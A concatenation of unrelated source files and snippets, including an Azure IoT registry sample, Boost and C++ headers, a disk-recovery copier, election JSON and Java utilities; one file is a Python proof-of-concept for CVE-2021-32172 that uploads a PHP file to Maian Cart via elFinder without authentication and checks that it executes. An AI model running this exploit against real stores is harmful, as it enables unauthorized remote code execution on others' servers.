iothub_registry_manager.get_twin(device_id) print(twin) print("") additional_props = twin.additional_properties if "modelId" in additional_props: print("Model id for digital twin is") print("ModelId:" + additional_props["modelId"]) # # Replace twin new_twin = Twin() new_twin = twin new_twin.properties = TwinProperties(desired={"telemetryInterval": 9000}) print(new_twin) print("") replaced_twin = iothub_registry_manager.replace_twin(device_id, new_twin) print(replaced_twin) print("") # Update twin twin_patch = Twin() twin_patch.properties = TwinProperties(desired={"telemetryInterval": 3000}) updated_twin = iothub_registry_manager.update_twin(device_id, twin_patch, twin.etag) print(updated_twin) print("The twin patch has been successfully applied") # Get devices max_number_of_devices = 10 devices = iothub_registry_manager.get_devices(max_number_of_devices) if devices: x = 0 for d in devices: print_device_info("Get devices {0}".format(x), d) x += 1 else: print("No device found") # Delete the device iothub_registry_manager.delete_device(device_id) print("GetServiceStatistics") registry_statistics = iothub_registry_manager.get_service_statistics() print(registry_statistics) print("GetDeviceRegistryStatistics") registry_statistics = iothub_registry_manager.get_device_registry_statistics() print(registry_statistics) except Exception as ex: print("Unexpected error {0}".format(ex)) except KeyboardInterrupt: print("iothub_registry_manager_sample stopped")
2,001
317
import logging from ...relocation import Relocation l=logging.getLogger(name=__name__) # Reference: https://msdn.microsoft.com/en-us/library/ms809762.aspx class PEReloc(Relocation): AUTO_HANDLE_NONE = True def __init__(self, owner, symbol, addr, resolvewith=None): # pylint: disable=unused-argument super().__init__(owner, symbol, addr) self.resolvewith = resolvewith if self.resolvewith is not None: self.resolvewith = self.resolvewith.lower() def resolve_symbol(self, solist, bypass_compatibility=False, extern_object=None, **kwargs): if not bypass_compatibility: solist = [x for x in solist if self.resolvewith == x.provides] super().resolve_symbol(solist, bypass_compatibility=bypass_compatibility, extern_object=extern_object, **kwargs) if self.resolvedby is None: return # handle symbol forwarders newsym = self.resolvedby.resolve_forwarder() if newsym is None: new_symbol = extern_object.make_extern(self.symbol.name, sym_type=self.symbol.type) self.resolvedby.resolvedby = new_symbol self.resolve(new_symbol) return self.resolvedby = newsym self.symbol.resolvedby = newsym def relocate(self): if self.symbol is None: # relocation described in the DIRECTORY_ENTRY_BASERELOC table value = self.value if value is None: l.debug('Unresolved relocation with no symbol.') return self.owner.memory.store(self.relative_addr, value) else: super().relocate() @property def value(self): if self.resolved: return self.resolvedby.rebased_addr @property def is_base_reloc(self): """ These relocations are ignored by the linker if the executable is loaded at its preferred base address. There is no associated symbol with base relocations. """ return True if self.symbol is None else False @property def is_import(self): return not self.is_base_reloc
915
12,278
// Ordered slots hello world example for Boost.Signals2 // Copyright <NAME> 2001-2004. // Copyright <NAME> 2009. // // Use, modification and // distribution is subject to the Boost Software License, Version // 1.0. (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) // For more information, see http://www.boost.org #include <iostream> #include <boost/signals2/signal.hpp> struct Hello { void operator()() const { std::cout << "Hello"; } }; struct World { void operator()() const { std::cout << ", World!" << std::endl; } }; //[ good_morning_def_code_snippet struct GoodMorning { void operator()() const { std::cout << "... and good morning!" << std::endl; } }; //] int main() { //[ hello_world_ordered_code_snippet boost::signals2::signal<void ()> sig; sig.connect(1, World()); // connect with group 1 sig.connect(0, Hello()); // connect with group 0 //] //[ hello_world_ordered_invoke_code_snippet // by default slots are connected at the end of the slot list sig.connect(GoodMorning()); // slots are invoked this order: // 1) ungrouped slots connected with boost::signals2::at_front // 2) grouped slots according to ordering of their groups // 3) ungrouped slots connected with boost::signals2::at_back sig(); //] return 0; }
452
2,023
#!/usr/local/bin/python -O # read faulty # for each of its arguments, it tries to copy the faulty file to the cwd import sys, os, errno import collections import cPickle as Pickle import gzip # use the correct errno reported per platform if sys.platform == 'win32': read_failed= lambda exc: exc.errno == errno.EACCES else: read_failed= lambda exc: exc.errno == errno.EIO class Chunk(object): "A description of a data chunk to be read" UNIT= 2048 BIG_UNIT= 32*UNIT def __init__(self, offset, size): self.offset= offset self.size= size def next_attempt(self): "Return sequence of chunks to retry" if self.size == self.UNIT: # a single sector failed yield self # try again in the next phase else: for ix in xrange(self.offset, self.offset+self.size, self.UNIT): yield self.__class__(ix, self.UNIT) def __getstate__(self): return self.offset, self.size def __setstate__(self, tpl): self.offset, self.size= tpl def description(self): "Return textual description of chunk" unit1= self.offset / self.UNIT unit2= (self.offset+self.size) / self.UNIT - 1 if unit1 == unit2: return "%dMiB:%d" % (self.offset//1048576, unit1) else: return "%dMiB:%d-%d" % (self.offset//1048576, unit1, unit2) class SuspectFile(object): "A file to be copied" destination= "." def __init__(self, filename, destination=None): # phase 1 contains big chunks to be read # phase 2 contains sectors to re-read # phase 3 contains chunks to store as completely failed self.filename= filename if destination is not None: self.destination= destination self.state_filename= os.path.basename(filename) + ".state" self.phase3= collections.deque() try: self.read_last_attempt_state() except IOError: # state file does not exist self.phase1= self.chunks_to_read() self.phase2= collections.deque() def chunks_to_read(self): result= collections.deque() filesize= os.path.getsize(self.filename) for offset in xrange(0, filesize, Chunk.BIG_UNIT): result.append(Chunk( offset, filesize-offset>Chunk.BIG_UNIT and Chunk.BIG_UNIT or filesize-offset)) return result def record_state(self): if self.phase1 or self.phase2 or self.phase3: fpr= gzip.open(self.state_filename, "wb") Pickle.dump(self.phase1, fpr, -1) dummy_deque= collections.deque() dummy_deque.extend(self.phase2) dummy_deque.extend(self.phase3) Pickle.dump(dummy_deque, fpr, -1) fpr.close() else: try: os.remove(self.state_filename) except OSError: pass # ignore non-existant filename @staticmethod def copy_chunk(fpi, fpo, chunk): fpi.seek(chunk.offset) data= fpi.read(chunk.size) if data: fpo.seek(chunk.offset) fpo.write(data) return data def read_last_attempt_state(self): fpr= gzip.open(self.state_filename, "rb") self.phase1= Pickle.load(fpr) self.phase2= Pickle.load(fpr) # the report_* methods are to be overloaded def report_attempt(self, chunk): "This is to be overloaded with a way to report progress" pass def report_success(self, chunk): pass def report_failure(self, chunk): pass def phase_copy(self, fpi, fpo, phase_in, phase_out): "Copy chunks from fpi to fpo storing failures in phase_out" while phase_in: chunk= phase_in.popleft() try: # to make sure this chunk is not skipped, eg by KeyboardInterrupt self.report_attempt(chunk) try: self.copy_chunk(fpi, fpo, chunk) except IOError, exc: if read_failed(exc): # the way windows reports failure for new_chunk in chunk.next_attempt(): phase_out.append(new_chunk) chunk= None self.report_failure(chunk) else: raise else: # report success, but first make sure chunk is None _, chunk= chunk, None self.report_success(_) finally: if chunk: phase_in.appendleft(chunk) def copy(self): "Copy the file to the local directory" fpi= open(self.filename, "rb") fpo_filename= os.path.join( self.destination, os.path.basename(self.filename)) try: fpo= open(fpo_filename, "r+b") except IOError, exc: if exc.errno == errno.ENOENT: fpo= open(fpo_filename, "wb") else: raise try: self.phase_copy(fpi, fpo, self.phase1, self.phase2) self.phase_copy(fpi, fpo, self.phase2, self.phase3) finally: self.record_state() if __name__=="__main__": class SuspectFileCmd(SuspectFile): def report_attempt(self, chunk): sys.stderr.write(chunk.description()) def report_success(self, chunk): sys.stderr.write("\r") def report_failure(self, chunk): sys.stderr.write(" failed\n") def record_state(self): super(SuspectFileCmd, self).record_state() sys.stderr.write("** remaining %d bytes in fast reads\n" % sum(chunk.size for chunk in self.phase1)) sys.stderr.write("and %d sectors in re-reads\n" % (len(self.phase2) + len(self.phase3)) ) for filename in sys.argv[1:]: faulty_file= SuspectFileCmd(filename) sys.stderr.write("copying %s\n" % filename) faulty_file.copy() sys.stderr.write("\n")
2,983
312
<reponame>RichardRanft/Torque6<gh_stars>100-1000 //----------------------------------------------------------------------------- // Copyright (c) 2015 <NAME> // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to // deal in the Software without restriction, including without limitation the // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or // sell copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS // IN THE SOFTWARE. //----------------------------------------------------------------------------- #ifndef _ANIMATION_COMPONENT_H_ #define _ANIMATION_COMPONENT_H_ #ifndef _ASSET_PTR_H_ #include "assets/assetPtr.h" #endif #ifndef _BASE_COMPONENT_H_ #include "baseComponent.h" #endif #ifndef _MESH_COMPONENT_H_ #include "meshComponent.h" #endif #ifndef _SCENE_TICKABLE_H_ #include "scene/sceneTickable.h" #endif namespace Scene { class DLL_PUBLIC AnimationComponent : public BaseComponent, public virtual SceneTickable { private: typedef BaseComponent Parent; StringTableEntry mMeshAssetId; AssetPtr<MeshAsset> mMeshAsset; SimObjectPtr<MeshComponent> mTarget; StringTableEntry mTargetName; S32 mAnimationIndex; F64 mAnimationTime; F32 mSpeed; public: AnimationComponent(); void onAddToScene(); void onRemoveFromScene(); void refresh() { } virtual void processMove( const Move *move ); virtual void interpolateMove( F32 delta ); virtual void advanceMove( F32 dt ); virtual void interpolateTick(F32 delta); virtual void processTick(); virtual void advanceTime(F32 timeDelta); static void initPersistFields(); DECLARE_CONOBJECT(AnimationComponent); F32 getSpeed() { return mSpeed; } void setSpeed(F32 val) { mSpeed = val; } SimObjectPtr<MeshComponent> getTarget() { return mTarget; } void setTarget(SimObjectPtr<MeshComponent> val) { mTarget = val; } AssetPtr<MeshAsset> getMesh() { return mMeshAsset; } void setMesh(const char* pMeshAssetId); void setAnimationIndex(U32 index); Vector<StringTableEntry> getAnimationNames(); protected: static bool setMeshField(void* obj, const char* data) { static_cast<AnimationComponent*>(obj)->setMesh( data ); return false; } static bool setAnimationIndexField(void* obj, const char* data) { static_cast<AnimationComponent*>(obj)->setAnimationIndex((U32)dAtoi(data)); return false; } }; } #endif // _ANIMATION_COMPONENT_H_
1,203
348
{"nom":"Isse","circ":"4ème circonscription","dpt":"Marne","inscrits":104,"abs":46,"votants":58,"blancs":1,"nuls":1,"exp":56,"res":[{"nuance":"LR","nom":"<NAME>","voix":42},{"nuance":"FN","nom":"M. <NAME>","voix":14}]}
89
2,416
/* * Copyright (C) 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.gvr.exoplayersupport.sample; import android.os.AsyncTask; import android.util.Log; import java.io.BufferedInputStream; import java.io.IOException; import java.io.InputStream; import java.net.HttpURLConnection; import java.net.MalformedURLException; import java.net.URL; import java.net.URLDecoder; import java.nio.charset.Charset; /** * Helper class to retrieve the dash info for a YouTube video. This is used to display the 360 * degree Jump video. * * <p>This is an abstract class that loads the information for the video, then calls * onPostExecute(). Implementations of that method can check the isCanceled() property to make sure * the information is retrieved correctly, then proceed to display the video. */ public abstract class YouTubeDashInfo { private static final String TAG = "youtubedashinfo"; private final String key; private String url; private String id; private boolean canceled; /** * Create the object. * * @param key - this is the key to the YouTube video found on the URL to the video in the browser. */ public YouTubeDashInfo(String key) { this.key = key; } /** Starts the async task to retrieve and parse the information. */ public void execute() { AsyncTask task = new AsyncTask<Object, Void, YouTubeDashInfo>() { final YouTubeDashInfo owner = YouTubeDashInfo.this; /** * Override this method to perform a computation on a background thread. The specified * parameters are the parameters passed to {@link #execute} by the caller of this task. * * <p>This method can call {@link #publishProgress} to publish updates on the UI thread. * * @param params The parameters of the task. * @return A result, defined by the subclass of this task. * @see #onPreExecute() * @see #onPostExecute * @see #publishProgress */ @Override protected YouTubeDashInfo doInBackground(Object... params) { YouTubeDashInfo info = (YouTubeDashInfo) params[0]; info.update(); return info; } /** * Applications should preferably override {@link #onCancelled(Object)}. This method is * invoked by the default implementation of {@link #onCancelled(Object)}. * * <p> * * <p>Runs on the UI thread after {@link #cancel(boolean)} is invoked and {@link * #doInBackground(Object[])} has finished. * * @see #onCancelled(Object) * @see #cancel(boolean) * @see #isCancelled() */ @Override protected void onCancelled() { super.onCancelled(); owner.setCanceled(true); owner.onPostExecute(); } /** * Runs on the UI thread after {@link #doInBackground}. The specified result is the value * returned by {@link #doInBackground}. * * <p> * * <p>This method won't be invoked if the task was cancelled. * * @param dashInfo The result of the operation computed by {@link #doInBackground}. * @see #onPreExecute * @see #doInBackground * @see #onCancelled(Object) */ @Override protected void onPostExecute(YouTubeDashInfo dashInfo) { super.onPostExecute(dashInfo); dashInfo.onPostExecute(); } }; // kick off the async task here. task.execute(this); } /** This is called when the background processing is completed. */ protected abstract void onPostExecute(); /** Method to retrieve the information from YouTube and parse it. */ private void update() { URL url; try { url = new URL("http://www.youtube.com/get_video_info?&video_id=" + key); } catch (MalformedURLException e) { Log.e(TAG, "Exception parsing url", e); setCanceled(true); return; } HttpURLConnection urlConnection; try { urlConnection = (HttpURLConnection) url.openConnection(); urlConnection.setInstanceFollowRedirects(true); } catch (IOException e) { Log.e(TAG, "Exception getting " + url, e); setCanceled(true); return; } try { InputStream in = new BufferedInputStream(urlConnection.getInputStream()); readStream(in); } catch (IOException e) { Log.e(TAG, "Exception reading response of " + url, e); setCanceled(true); } finally { urlConnection.disconnect(); } } /** * Method to parse the response from YouTube. We are only interested in the dashmpd information, * so we skip all the other, and return when we have found what we need. * * @param in - the inputstream containing the response. * @throws IOException - when there is a problem. */ private void readStream(InputStream in) throws IOException { int len = 16 * 1024; byte[] buf = new byte[len]; int read = 1; int tot = 0; String s = ""; while (read > 0) { read = in.read(buf); if (read > 0) { tot += read; s += new String(buf, 0, read); } } s = URLDecoder.decode(s, Charset.defaultCharset().name()); String[] parts = s.split("&"); url = "read " + tot + " bytes"; for (String p : parts) { if (p.startsWith("dashmpd=")) { String val = p.substring("dashmpd=".length()); url = URLDecoder.decode(val, Charset.defaultCharset().name()); // pull out the content ID also. int idx = url.indexOf("/id/"); if (idx >= 0) { String id = url.substring(idx); idx = id.length() > 4 ? id.indexOf("/", 5) : -1; if (idx > 0) { id = id.substring(4, id.indexOf("/", 5)); this.id = id; return; } } // if we're not done, keep reading the input stream. break; } } } /** * The URL to the video stream. * * @return non-null once execute() has completed successfully. */ public String getUrl() { return url; } /** * The content ID of the video stream. * * @return non-null once execute() has completed successfully. */ public String getId() { return id; } protected void setCanceled(boolean canceled) { this.canceled = canceled; } /** @return true if processing of the request was canceled. */ public boolean isCanceled() { return canceled; } }
2,825
411
<filename>documents4j-util-conversion/src/main/java/com/documents4j/job/InputStreamSourceFromFileSource.java<gh_stars>100-1000 package com.documents4j.job; import com.documents4j.api.IFileSource; import com.documents4j.api.IInputStreamSource; import com.documents4j.throwables.FileSystemInteractionException; import com.google.common.base.MoreObjects; import com.google.common.io.Closeables; import java.io.*; class InputStreamSourceFromFileSource implements IInputStreamSource { private final IFileSource fileSource; private volatile File file; public InputStreamSourceFromFileSource(IFileSource fileSource) { this.fileSource = fileSource; } @Override public InputStream getInputStream() { file = fileSource.getFile(); try { FileInputStream fileInputStream = new FileInputStream(file); fileInputStream.getChannel().lock(0L, Long.MAX_VALUE, true); return fileInputStream; } catch (FileNotFoundException e) { throw new FileSystemInteractionException(String.format("Could not find file %s", file), e); } catch (IOException e) { throw new FileSystemInteractionException(String.format("Could not read file %s", file), e); } } @Override public void onConsumed(InputStream inputStream) { try { close(inputStream); } finally { fileSource.onConsumed(file); } } private void close(InputStream inputStream) { try { Closeables.close(inputStream, false); } catch (IOException e) { throw new FileSystemInteractionException(String.format("Could not close stream for file %s", file), e); } } @Override public String toString() { return MoreObjects.toStringHelper(InputStreamSourceFromFileSource.class) .add("file", file) .add("fileSource", fileSource) .toString(); } }
779
14,499
/* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ #pragma once #include "project_lib.h" // even though it's unused, it should be translated if compiled source is // main.cpp (or a symbolic link pointing to it) int unused_deref_in_header(int* a) { int x = internal::used_in_main_header(0); return *a; }
139
2,023
import re DIGITS = re.compile(r'[0-9]+') def compnum(x, y): nx = ny = 0 while True: a = DIGITS.search(x, nx) b = DIGITS.search(y, ny) if None in (a,b): return cmp(x[nx:], y[ny:]) r = (cmp(x[nx:a.start()], y[ny:b.start()]) or cmp(int(x[a.start():a.end()]), int(y[b.start():b.end()]))) if r: return r nx, ny = a.end(), b.end() # # sample # L1 = ["file~%d.txt"%i for i in range(1,15)] L2 = L1[:] L1.sort() L2.sort(compnum) for i,j in zip(L1, L2): print "%15s %15s" % (i,j)
347
971
package com.ucar.datalink.manager.core.flinker.cron.entity; /** * Created by yang.wang09 on 2019-02-13 15:51. */ public class EntityCronMaxRuntime { }
58
578
/* * Copyright (C) 2016 Red Hat, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.syndesis.integration.component.proxy; import org.apache.camel.CamelContext; import org.apache.camel.Endpoint; import org.apache.camel.impl.DefaultCamelContext; import org.apache.camel.util.CollectionHelper; import org.junit.jupiter.api.Test; import com.acme.corp.AcmeComponent; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatExceptionOfType; public class CustomComponentTest { @Test public void testCustomComponent() { assertThatExceptionOfType(IllegalArgumentException.class).isThrownBy(() -> new ComponentProxyComponent("acme-1", "acme")) .withMessage( "Failed to find component definition for scheme 'acme'. Missing component definition in classpath 'org/apache/camel/catalog/components/acme.json'"); } @Test public void testCustomComponentEndpoint() throws Exception { final CamelContext context = new DefaultCamelContext(); final ComponentProxyComponent component = new ComponentProxyComponent("acme-1", "acme", AcmeComponent.class); component.setCamelContext(context); component.setOptions(CollectionHelper.mapOf("name", "test", "param", "p1")); component.start(); final Endpoint endpoint = component.createEndpoint("acme"); assertThat(endpoint).isInstanceOf(ComponentProxyEndpoint.class); assertThat(endpoint).hasFieldOrPropertyWithValue("delegateEndpointUri", "acme://test?param=p1"); } @Test public void testCustomComponentWithClass() { final ComponentProxyComponent proxyComponent = new ComponentProxyComponent("acme-1", "acme", AcmeComponent.class); assertThat(proxyComponent.getComponentId()).isEqualTo("acme-1"); assertThat(proxyComponent.getComponentScheme()).isEqualTo("acme"); } @Test public void testCustomComponentWithClassName() { final ComponentProxyComponent proxyComponent = new ComponentProxyComponent("acme-1", "acme", AcmeComponent.class.getName()); assertThat(proxyComponent.getComponentId()).isEqualTo("acme-1"); assertThat(proxyComponent.getComponentScheme()).isEqualTo("acme"); } }
909
421
import requests import random import string # Vuln Base Info def info(): return { "author": "cckuailong", "name": '''Maian Cart 3.8 preauth RCE''', "description": '''A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.''', "severity": "critical", "references": [ "https://dreyand.github.io/maian-cart-rce/", "https://github.com/DreyAnd/maian-cart-rce", "https://www.maianscriptworld.co.uk/critical-updates", "https://nvd.nist.gov/vuln/detail/CVE-2021-32172" ], "classification": { "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cvss-score": "", "cve-id": "CVE-2021-32172", "cwe-id": "CWE-862" }, "metadata":{ "vuln-target": "", }, "tags": ["cve", "cve2021", "rce", "unauth", "maian"], } # Vender Fingerprint def fingerprint(url): return True # Proof of Concept def poc(url): result = {} randstr = gen_randstr() randstr_1 = gen_randstr() try: url = format_url(url) path = """/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={randstr}.php&target=l1_Lw""".format(randstr=randstr) method = "GET" data = """""" headers = {'Accept': '*/*'} resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) path = """/admin/index.php?p=ajax-ops&op=elfinder""" method = "POST" data = """cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{randstr_1}%22%3b%20%3f%3e""".format(randstr_1=randstr_1) headers = {'Accept': 'application/json, text/javascript, /; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'} resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) path = """/product-downloads/{randstr}.php""".format(randstr=randstr) method = "GET" data = """""" headers = {'Accept': '*/*'} resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) if resp2.status_code == 200 and randstr_1 in resp2.text: result["success"] = True result["info"] = info() result["payload"] = url+path except: result["success"] = False return result # Exploit, can be same with poc() def exp(url): return poc(url) # Utils def format_url(url): url = url.strip() if not ( url.startswith('http://') or url.startswith('https://') ): url = 'http://' + url url = url.rstrip('/') return url def gen_randstr(length): return ''.join(random.sample(string.ascii_letters + string.digits, length))
1,417
332
<gh_stars>100-1000 from django.contrib import admin import billing.models as billing_models admin.site.register(billing_models.GCNewOrderNotification) admin.site.register(billing_models.AuthorizeAIMResponse) admin.site.register(billing_models.WorldPayResponse) admin.site.register(billing_models.AmazonFPSResponse) class PaylaneTransactionAdmin(admin.ModelAdmin): list_display = ('customer_name', 'customer_email', 'transaction_date', 'amount', 'success', 'error_code') list_filter = ('success',) ordering = ('-transaction_date',) search_fields = ['customer_name', 'customer_email'] admin.site.register(billing_models.PaylaneTransaction, PaylaneTransactionAdmin)
215
809
<reponame>nikitavlaev/embox /** * @file * * @date 27.09.2013 * @author <NAME> */ extern int __cxa_atexit(void (*destructor) (void *), void *arg, void *__dso_handle); int __aeabi_atexit(void *object, void (*dtor)(void *this), void *handle) { return __cxa_atexit(dtor, object, handle); }
120
348
<filename>docs/data/leg-t2/037/03702240.json {"nom":"Saunay","circ":"2ème circonscription","dpt":"Indre-et-Loire","inscrits":487,"abs":265,"votants":222,"blancs":21,"nuls":3,"exp":198,"res":[{"nuance":"LR","nom":"<NAME>","voix":107},{"nuance":"REM","nom":"<NAME>","voix":91}]}
114
575
<filename>ui/views/test/test_desktop_screen_x11.cc // Copyright 2016 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "ui/views/test/test_desktop_screen_x11.h" #include <memory> #include "base/memory/singleton.h" namespace views { namespace test { TestDesktopScreenX11* TestDesktopScreenX11::GetInstance() { return base::Singleton<TestDesktopScreenX11>::get(); } gfx::Point TestDesktopScreenX11::GetCursorScreenPoint() { return cursor_screen_point_; } TestDesktopScreenX11::TestDesktopScreenX11() { DesktopScreenX11::Init(); } TestDesktopScreenX11::~TestDesktopScreenX11() = default; } // namespace test } // namespace views
240
1,444
<filename>Mage.Sets/src/mage/cards/p/Pendelhaven.java package mage.cards.p; import java.util.UUID; import mage.abilities.Ability; import mage.abilities.common.SimpleActivatedAbility; import mage.abilities.costs.common.TapSourceCost; import mage.abilities.effects.common.continuous.BoostTargetEffect; import mage.abilities.mana.GreenManaAbility; import mage.cards.CardImpl; import mage.cards.CardSetInfo; import mage.constants.CardType; import mage.constants.ComparisonType; import mage.constants.Duration; import mage.constants.SuperType; import mage.constants.Zone; import mage.filter.common.FilterCreaturePermanent; import mage.filter.predicate.mageobject.PowerPredicate; import mage.filter.predicate.mageobject.ToughnessPredicate; import mage.target.common.TargetCreaturePermanent; /** * @author Loki */ public final class Pendelhaven extends CardImpl { private static final FilterCreaturePermanent filter = new FilterCreaturePermanent("1/1 creature"); static { filter.add(new PowerPredicate(ComparisonType.EQUAL_TO, 1)); filter.add(new ToughnessPredicate(ComparisonType.EQUAL_TO, 1)); } public Pendelhaven(UUID ownerId, CardSetInfo setInfo) { super(ownerId, setInfo, new CardType[]{CardType.LAND}, null); addSuperType(SuperType.LEGENDARY); // {tap}: Add {G}. this.addAbility(new GreenManaAbility()); // {tap}: Target 1/1 creature gets +1/+2 until end of turn. Ability ability = new SimpleActivatedAbility(Zone.BATTLEFIELD, new BoostTargetEffect(1, 2, Duration.EndOfTurn), new TapSourceCost()); ability.addTarget(new TargetCreaturePermanent(filter)); this.addAbility(ability); } private Pendelhaven(final Pendelhaven card) { super(card); } @Override public Pendelhaven copy() { return new Pendelhaven(this); } }
646
367
#import <Foundation/Foundation.h> @class MBEOBJGroup; @interface MBEOBJModel : NSObject - (instancetype)initWithContentsOfURL:(NSURL *)fileURL generateNormals:(BOOL)generateNormals; /// Index 0 corresponds to an unnamed group that collects all the geometry /// declared outside of explicit "g" statements. Therefore, if your file /// contains explicit groups, you'll probably want to start from index 1, /// which will be the group beginning at the first group statement. @property (nonatomic, readonly) NSArray *groups; /// Retrieve a group from the OBJ file by name - (MBEOBJGroup *)groupForName:(NSString *)groupName; @end
179
435
<reponame>glasnt/data { "description": "Day 2, 14:30\u201315:00\n\nThis talk will share several python approaches to the thriving field, quantum computing and quantum information. In this talk, Cirq python framework, which is an open source project announced by Google, will be mainly used as examples.\n\nSlides: https://bit.ly/35cOeeR\n\nSpeaker: \u4f55\u6cf0\u7965 <NAME> (tai271828)\n\nCanonical Software Engineer. FLOSS contributor. Scientific computing amateur. Climber, pianist and cellist.", "recorded": "2020-09-06", "speakers": [ "\u4f55\u6cf0\u7965 <NAME> (tai271828)" ], "thumbnail_url": "https://i.ytimg.com/vi/rZb7lZCZ1jM/hqdefault.jpg", "title": "Python Approach to Quantum Computing - Cirq Framework and More \u2013 PyCon Taiwan 2020", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=rZb7lZCZ1jM" } ] }
333
14,425
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.yarn.server.timelineservice.storage.common; /** * Interface which has to be implemented for encoding and decoding row keys or * column qualifiers as string. */ public interface KeyConverterToString<T> { /** * Encode key as string. * @param key of type T to be encoded as string. * @return encoded value as string. */ String encodeAsString(T key); /** * Decode row key from string to a key of type T. * @param encodedKey string representation of row key * @return type T which has been constructed after decoding string. */ T decodeFromString(String encodedKey); }
379
852
<reponame>ckamtsikis/cmssw<gh_stars>100-1000 import FWCore.ParameterSet.Config as cms from DQM.L1TMonitor.L1TFED_cfi import *
56
1,442
<gh_stars>1000+ #ifndef POINCARE_N_ARY_INFIX_EXPRESSION_H #define POINCARE_N_ARY_INFIX_EXPRESSION_H #include <poincare/n_ary_expression.h> // NAryInfixExpressionNode are additions and multiplications namespace Poincare { class NAryInfixExpressionNode : public NAryExpressionNode { public: using NAryExpressionNode::NAryExpressionNode; // Properties bool childAtIndexNeedsUserParentheses(const Expression & child, int childIndex) const override; protected: // Order int simplificationOrderSameType(const ExpressionNode * e, bool ascending, bool ignoreParentheses) const override; int simplificationOrderGreaterType(const ExpressionNode * e, bool ascending, bool ignoreParentheses) const override; }; } #endif
220
1,805
#ifndef infonet_h #define infonet_h ///////////////////////////////////////////////// // Includes #include "base.h" ///////////////////////////////////////////////// // Thermal-Schedule ClassTP(TThermalSch, PThermalSch)//{ private: PXmlDoc TherapyPlacesXmlDoc; PXmlDoc ActivitiesXmlDoc; PXmlDoc AvailableTherapyPlacesXmlDoc; PXmlDoc AvailableActivitiesXmlDoc; PXmlDoc ScheduledActivitiesXmlDoc; PXmlDoc HolidaysXmlDoc; PXmlDoc MakeScheduleXmlDoc; PXmlDoc CheckScheduleXmlDoc; public: TThermalSch(){} static PThermalSch New(){return PThermalSch(new TThermalSch());} TThermalSch(TSIn&){Fail;} static PThermalSch Load(TSIn& SIn){return new TThermalSch(SIn);} void Save(TSOut&){Fail;} TThermalSch& operator=(const TThermalSch&){Fail; return *this;} // field-retrieval TStr GetFldVal(const PXmlTok& RecXmlTok, const TStr& FldNm) const; TStr GetFldVal(const PXmlDoc& RecXmlDoc, const TStr& FldNm) const; TStr GetFldDateVal(const PXmlTok& RecXmlTok, const TStr& FldNm) const; TStr GetFldDateVal(const PXmlDoc& RecXmlDoc, const TStr& FldNm) const; TStrV GetFldValV(const PXmlTok& RecXmlTok, const TStr& FldNm, const TStr& XFldNm, const TStr& SubFldNm=TStr()) const; // xml-output static TStr GetXmlOut_Ok(const TStr& OpNm); static TStr GetXmlOut_Error(const TStr& OpNm, const TStr& MsgStr); // execute generic commands TStr ExeCmFromXml(const PSIn& SIn); TStr ExeCmFromXmlFile(const TStr& FNm, const TStr& FPath); TStr ExeCmFromXmlStr(const TStr& Str); // execute specific commands TStr ExeCm_SetCatalogueTherapyPlaces(const PXmlDoc& XmlDoc); TStr ExeCm_SetCatalogueActivities(const PXmlDoc& XmlDoc); TStr ExeCm_SetCatalogueAvailableTherapyPlaces(const PXmlDoc& XmlDoc); TStr ExeCm_SetCatalogueAvailableActivities(const PXmlDoc& XmlDoc); TStr 